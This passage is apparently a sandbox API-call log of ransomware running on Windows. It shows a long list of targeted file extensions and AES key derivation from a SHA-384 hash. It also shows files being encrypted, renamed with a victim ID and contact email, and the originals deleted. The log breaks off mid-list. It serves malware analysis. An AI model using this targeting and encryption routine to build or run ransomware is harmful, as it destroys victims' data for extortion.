	[0182.483] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pdf") returned=".pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.483] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.483] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.483] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.509] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x12cd5, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x12cd5, lpOverlapped=0x0) returned 1
	[0182.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.512] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcabc0) returned 1
	[0182.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.515] CryptCreateHash (in: hProv=0xfcabc0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.515] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.515] CryptDeriveKey (in: hProv=0xfcabc0, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0182.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.515] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x12cd5, dwBufLen=0x12cd5 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x12ce0) returned 1
	[0182.518] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.518] RtlMoveMemory (in: Destination=0xfefe60, Source=0xfdd180, Length=0x12cd5 | out: Destination=0xfefe60) 
	[0182.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.518] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfefe60*, pdwDataLen=0x18bc0c*=0x12cd5, dwBufLen=0x12ce0 | out: pbData=0xfefe60*, pdwDataLen=0x18bc0c*=0x12ce0) returned 1
	[0182.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.521] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0182.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.522] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0182.522] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.522] CryptReleaseContext (hProv=0xfcabc0, dwFlags=0x0) returned 1
	[0182.522] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.522] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.523] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.524] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 84
	[0182.524] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.525] WriteFile (in: hFile=0x388, lpBuffer=0xfefe60*, nNumberOfBytesToWrite=0x12ce0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfefe60*, lpNumberOfBytesWritten=0x18c068*=0x12ce0, lpOverlapped=0x0) returned 1
	[0182.530] CloseHandle (hObject=0x388) returned 1
	[0182.530] CloseHandle (hObject=0x384) returned 1
	[0182.530] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf")) returned 1
	[0182.539] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf")) returned 0
	[0182.539] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4535e420, ftCreationTime.dwHighDateTime=0x1d96ddd, ftLastAccessTime.dwLowDateTime=0x2ae61ca0, ftLastAccessTime.dwHighDateTime=0x1d970dc, ftLastWriteTime.dwLowDateTime=0x2ae61ca0, ftLastWriteTime.dwHighDateTime=0x1d970dc, nFileSizeHigh=0x0, nFileSizeLow=0x523f, dwReserved0=0x0, dwReserved1=0x0, cFileName="uyJB6pLQkgWbR.odt", cAlternateFileName="UYJB6P~1.ODT")) returned 1
	[0182.540] lstrcmpW (lpString1="uyJB6pLQkgWbR.odt", lpString2="..") returned 1
	[0182.540] lstrcmpW (lpString1="uyJB6pLQkgWbR.odt", lpString2=".") returned 1
	[0182.540] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.540] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="uyJB6pLQkgWbR.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\uyJB6pLQkgWbR.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\uyJB6pLQkgWbR.odt"
	[0182.540] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\uyJB6pLQkgWbR.odt") returned 47
	[0182.540] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.540] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\uyJB6pLQkgWbR.odt", cchLength=0x2f | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt") returned 0x2f
	[0182.540] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.541] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.541] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt") returned="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt"
	[0182.541] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\uyjb6plqkgwbr.odt") returned 47
	[0182.541] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.541] StrStrW (lpFirst=".odt", lpSrch=".") returned=".odt"
	[0182.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.542] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odt") returned=".odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pg